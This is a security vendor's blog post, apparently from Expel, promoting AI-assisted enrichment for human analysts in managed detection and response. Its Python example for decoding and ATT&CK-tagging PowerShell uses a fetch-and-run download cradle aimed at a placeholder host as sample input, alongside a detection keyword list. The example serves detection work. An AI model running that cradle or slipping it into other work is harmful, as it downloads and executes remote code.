Product · 5 MIN READ · JAKE GODGART · JUL 28, 2025 · TAGS: AI & automation

TL;DR

- Outsourcing alert triage to MDR providers often fails to solve the underlying problem as it simply relocates the issue.

- Current approaches to applying AI in cybersecurity are flawed as they either fail to support human analysts or lack contextual understanding.

- Expel’s approach empowers expert human judgment by applying AI and automation end-to-end, starting with data enrichment, to improve security outcomes.

When organizations are drowning in alerts, the immediate impulse is often to buy their way out of the pain. They sign a contract with a provider, hand over the reins, and forward their firehose of raw alerts from every security tool. (Spoiler alert: not every alert will be looked at. Make sure to read the fine print here, folks.)

On the other end, the provider throws a large team of analysts at that firehose to manually triage the alerts and investigate with event data. Problem solved, right?

But here’s the hard truth: It’s an illusion.

Wishing a problem away by outsourcing your alert triage process doesn’t make it disappear. You haven’t solved the problem. You’ve outsourced it.

Why “outsourcing” your alerts fails

The reality is that many MDR providers are simply taking your existing alert noise, processing it with mass labor, and then kicking the same fundamental issues back to you. The burden of investigating and deciding what to do next still falls on your team.

You’ve changed the location of your problem, not solved it. You’ve simply hired a scapegoat to deal with your mountain of alerts.

This failure isn’t because the analysts are bad; it’s because the brute-force model is inherently broken. These providers try to solve a machine-scale problem with a human labor solution. In fact, it’s so broken that some of these vendors are now outsourcing the outsourcing. (More on that later.)

Here’s the issue: The primary value of this kind of MDR is to force-multiply your team with its headcount, but the sheer volume and lack of clarity from modern security tools make it impossible for humans alone to manage effectively.

They are contractually trapped into only looking at symptoms (the alerts) because they don’t have the access, authority, or—most importantly—the technology to help fix the core issues causing them.

AI for enrichment, not just triage

So, how do you move from simply relocating your alert firehose to genuinely stopping threats?



This is where the conversation about AI gets interesting. With the failure of the brute-force model, many providers are now applying AI to the far right of the data and telemetry ingestion and alert management process. They use AI to find threats and automatically close tickets faster.

But this approach fails to help analysts at the point of decision, when they need to quickly orient on the data within an alert and decide, in seconds, how to triage, investigate, or close it. It leads to fewer alerts (and likely some missed threats), but it doesn’t help humans make quicker, better-informed decisions.

And just to be clear, closing out benign tickets in the queue is important, but it misses the larger issue. That’s just outsourcing the outsourcing. You and your company just outsourced the alert problem to an MDR, and the MDR is now outsourcing that same problem to an AI triage agent or bot. The fundamental work isn’t getting smarter, or even smaller.

On the other hand, a new breed of vendors pitches the opposite illusion: the fully autonomous, AI-driven SOC. They propose replacing human analysts with agentic SOC analysts who can plan, investigate, respond, and adapt on your behalf. While appealing on the surface, this creates a new, more sophisticated type of scapegoat.

AI can correlate data at machine speed, but it lacks genuine wisdom. It can’t understand business context, calculate nuanced risk, or recognize the subtle, creative intent of a human adversary that falls outside its training data. When a fully autonomous AI inevitably blocks a legitimate action from your CEO or misses a novel threat, who’s accountable? Point being, you’ve simply swapped a human scapegoat for a computational one, leaving your team to clean up the mess without a clear explanation.

This happens because both of these approaches are trying to patch a flawed premise. These services and solutions are often tied to their own “hero” product or a rigid technological belief system, rather than focusing on the ultimate outcome—detecting and responding to threats with speed, accuracy, and precision so the company doesn’t end up in the news (for the wrong reasons).

Our philosophy at Expel is different. We believe the goal isn’t to replace humans or to make overworked humans incrementally faster at triage. The goal is to empower expert human judgment. We apply AI and automation end to end, starting with making the data smarter before an analyst ever touches it. This requires AI and automation to start at the far left of the process, in the data pipeline and enrichment stages.

Only then can an MDR provider apply AI and automation to both the right and left sides of the entire triage and investigation process to enable more effective enrichment, detection, and decision support. This ultimately delivers better security outcomes for our customers.

What this looks like in practice

When we founded Expel, we knew the “throw more people at the problem” model was broken. We built our SOC’s platform, Expel Workbench™, with a different goal: create a world-class decision support system that empowers analysts. Every AI and automation capability we’ve developed serves this purpose.

1. Enriching the signal

Before an alert ever hits an analyst’s queue, our AI and automation workflows have already done the heavy lifting. They sift through events from your entire security stack—cloud, endpoint, identity, network—correlating weak signals that look like noise on their own but tell the story of an attack when combined. Our automation then enriches these findings with critical context by asking questions like “What’s this user’s normal behavior?” and “Have we seen this file before?” It will even automatically decode a complex PowerShell script and map it to MITRE ATT&CK. The result is that our analyst doesn’t get a raw alert; they get a curated case file, ready for a judgment call.
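To make the enrichment step above a little more concrete, here is a minimal Python sketch of the general idea. It is not Expel Workbench code. The event fields (`user`, `source`, `score`, `command_line`), the score threshold, and the keyword hints are all assumptions made up for illustration. The ATT&CK technique IDs are real, and the decoding step relies on the fact that PowerShell's encoded-command option takes Base64-encoded UTF-16LE text.

```python
from __future__ import annotations

import base64
import re
from collections import defaultdict
from typing import Optional

# Matches the common short forms of PowerShell's -EncodedCommand flag.
ENCODED_FLAG = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)

# Hypothetical keyword hints. The technique IDs are real ATT&CK IDs,
# but these keyword rules are illustrative, not a production mapping.
ATTACK_HINTS = {
    "downloadstring": "T1105",    # Ingress Tool Transfer
    "frombase64string": "T1140",  # Deobfuscate/Decode Files or Information
}


def decode_powershell(command_line: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")
    except ValueError:  # covers both bad Base64 and bad UTF-16
        return None


def map_to_attack(script: str) -> list[str]:
    """Tag a decoded PowerShell script with ATT&CK technique IDs."""
    techniques = {"T1059.001"}  # PowerShell execution itself
    lowered = script.lower()
    for keyword, technique in ATTACK_HINTS.items():
        if keyword in lowered:
            techniques.add(technique)
    return sorted(techniques)


def build_case_files(events: list[dict], threshold: float = 1.0) -> list[dict]:
    """Group weak signals by user; emit a case only when they add up."""
    by_user = defaultdict(list)
    for event in events:
        by_user[event["user"]].append(event)

    cases = []
    for user, user_events in by_user.items():
        score = sum(e["score"] for e in user_events)
        sources = {e["source"] for e in user_events}
        # Assumed rule: require signals from at least two different tools.
        if score < threshold or len(sources) < 2:
            continue
        decoded, techniques = [], set()
        for e in user_events:
            script = decode_powershell(e.get("command_line", ""))
            if script is not None:
                decoded.append(script)
                techniques.update(map_to_attack(script))
        cases.append({
            "user": user,
            "score": round(score, 2),
            "sources": sorted(sources),
            "decoded_scripts": decoded,
            "attack_techniques": sorted(techniques),
        })
    return cases


# Example: two weak signals for one user combine into a single case file.
script = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
events = [
    {"user": "alice", "source": "identity", "score": 0.4},
    {"user": "alice", "source": "endpoint", "score": 0.7,
     "command_line": f"powershell.exe -nop -enc {encoded}"},
    {"user": "bob", "source": "network", "score": 0.3},
]
cases = build_case_files(events)
print(cases)
```

Neither of alice's events would clear the threshold alone, and bob's single low-scoring event never becomes a case. That is the "weak signals that look like noise on their own" idea in miniature.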

2. Enriching the analyst’s decision

With that prep work done, the analyst can focus entirely on what matters. They aren’t wasting cognitive energy chasing down IP addresses or manually piecing together timelines. They have everything they need to answer the crucial questions:

- Is this a real threat?

- What’s the business risk?

- What’s the right response?

- What’s the most transparent explanation?

Our AI and automation provide the data; humans provide the wisdom. This is how we resolve critical incidents in under 20 minutes—not because a machine made a blind decision, but because a human made an informed one, faster.

3. Enriching the system itself (the flywheel effect)

Once our analyst makes that judgment call (remediating and closing an investigation, escalating a threat, or initiating a response), that expert human decision feeds directly back into our machine learning (ML) models, making them more accurate. For example, we train our large language models (LLMs) to generate key findings reports and detailed Close Reasons for benign behavior that’s difficult to prove. We also use ensembles of AI classifiers to provide decision support for identity-based alerts, helping our analysts make faster, more conclusive decisions. Similarly, our detection engineers use learnings from this feedback loop to write detections for the new or novel techniques we uncover, and those detections benefit every customer.
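As a rough illustration of how an analyst's verdict can feed back into an ensemble of classifiers, here is a small Python sketch. It is a toy, not a description of Expel's models. The three "classifiers" are hand-written stand-ins, the alert fields (`new_country`, `new_device`, `failed_logins`) are hypothetical, and a simple multiplicative weight update stands in for real model retraining.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Tuple

Alert = Dict[str, float]


@dataclass
class Ensemble:
    """Weighted average of classifier scores, reweighted by analyst verdicts."""
    classifiers: Dict[str, Callable[[Alert], float]]
    weights: Dict[str, float] = field(default_factory=dict)
    history: List[Tuple[Alert, bool]] = field(default_factory=list)

    def __post_init__(self) -> None:
        # Every classifier starts with the same say in the final score.
        for name in self.classifiers:
            self.weights.setdefault(name, 1.0)

    def score(self, alert: Alert) -> float:
        """Decision support for the analyst: a value between 0 and 1."""
        total = sum(self.weights.values())
        weighted = sum(
            self.weights[name] * clf(alert)
            for name, clf in self.classifiers.items()
        )
        return weighted / total

    def record_verdict(self, alert: Alert, malicious: bool, lr: float = 0.5) -> None:
        """Feed the human decision back: reward classifiers that agreed with it."""
        for name, clf in self.classifiers.items():
            agreed = (clf(alert) >= 0.5) == malicious
            self.weights[name] *= (1 + lr) if agreed else (1 - lr)
        self.history.append((alert, malicious))  # kept as labeled data


# Hypothetical stand-ins for trained identity classifiers.
def geo_model(alert: Alert) -> float:
    return 0.9 if alert["new_country"] else 0.1


def device_model(alert: Alert) -> float:
    return 0.8 if alert["new_device"] else 0.2


def velocity_model(alert: Alert) -> float:
    return min(alert["failed_logins"] / 10, 1.0)


ensemble = Ensemble({
    "geo": geo_model,
    "device": device_model,
    "velocity": velocity_model,
})
alert = {"new_country": 1, "new_device": 1, "failed_logins": 2}

before = ensemble.score(alert)
ensemble.record_verdict(alert, malicious=True)  # the analyst's judgment call
after = ensemble.score(alert)
print(before, after, ensemble.weights)
```

The ensemble only ever produces a score for the analyst to weigh, and the human verdict is what shifts the weights. The classifiers that disagreed with the analyst lose influence on the next similar alert.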

This is our human-in-the-loop flywheel. It’s a continuous, symbiotic cycle where our AI makes our analysts smarter and faster, and our analysts’ expertise makes our AI sharper. It scales the judgment of our best experts across our entire customer base so our thousandth customer gets the same quality of defense as our first customer.

Do you want a scapegoat, or do you want the G.O.A.T.?

The difference between a scapegoat security service and a true MDR partner is purpose. One is a reactive, brute-force model built to manage a flood of alerts—a system designed for a world that no longer exists. This outdated method only addresses the symptoms of a flawed system, not the root cause.

The other is a deliberate, modern approach that empowers expert analysts and solves the problems of speed and clarity by addressing them end-to-end. By enriching data at the very beginning, we enable our human experts to make better, faster decisions with support from AI. We didn’t try to patch a broken system; we built the right one from the start, combining human intelligence and machine efficiency.

So, as you choose a security partner, ask them this: Was your platform built to process alerts, or to empower experts? One choice leads to a prettier list of the same problems. The other leads to finding threats faster and resolving them before they can do harm. The choice is yours.